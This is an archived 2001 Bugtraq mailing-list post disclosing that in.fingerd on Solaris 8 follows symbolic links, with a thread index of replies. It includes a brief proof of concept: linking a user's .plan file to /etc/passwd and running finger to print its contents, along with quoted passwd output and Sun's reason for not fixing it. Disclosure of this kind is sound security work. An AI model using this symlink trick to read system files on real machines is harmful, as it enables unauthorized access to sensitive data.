Bugtraq mailing list archives
in.fingerd follows sym-links on Solaris 8
From: Lukasz Luzar <lluzar () developers of pl>
Date: Thu, 24 May 2001 18:14:59 +0200 (CEST)
Hello, Solaris 8 is still vulnerable to the old bug in in.fingerd daemon. lluzar@sun:~ (101) > ln -s /etc/passwd .plan lluzar@sun:~ (102) > finger -l lluzar () sun developers of pl [localhost] Login name: lluzar In real life: Lukasz Luzar Directory: /home/lluzar Shell: /bin/tcsh On since May 19 20:17:04 on pts/70 from unix.developers.of.pl Mail last read Sat May 19 13:51:12 2001 Plan: root:x:0:1:Super-User:/root:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: . . I believe it could be dangeours in some cases, but people from Sun says that they won't repair the in.fingerd because: "There are may be legitimate reasons for finger to follow symlinks. If finger is considered a security issue, it can be disabled. (..)" What do you think ? Cheers, -- Lukasz Luzar http://Developers.of.PL/ Crede quod habes, et habes
Current thread:
- in.fingerd follows sym-links on Solaris 8 Lukasz Luzar (May 24)
- Re: in.fingerd follows sym-links on Solaris 8 Lyndon Nerenberg (May 24)
- <Possible follow-ups>
- Re: in.fingerd follows sym-links on Solaris 8 Matthew R. Potter (May 24)
- Re: in.fingerd follows sym-links on Solaris 8 Lukasz Luzar (May 25)
- Re: in.fingerd follows sym-links on Solaris 8 J. Bol (May 28)
- Re: in.fingerd follows sym-links on Solaris 8 Joep Vesseur (May 28)
- Re: in.fingerd follows sym-links on Solaris 8 Darren Moffat (May 28)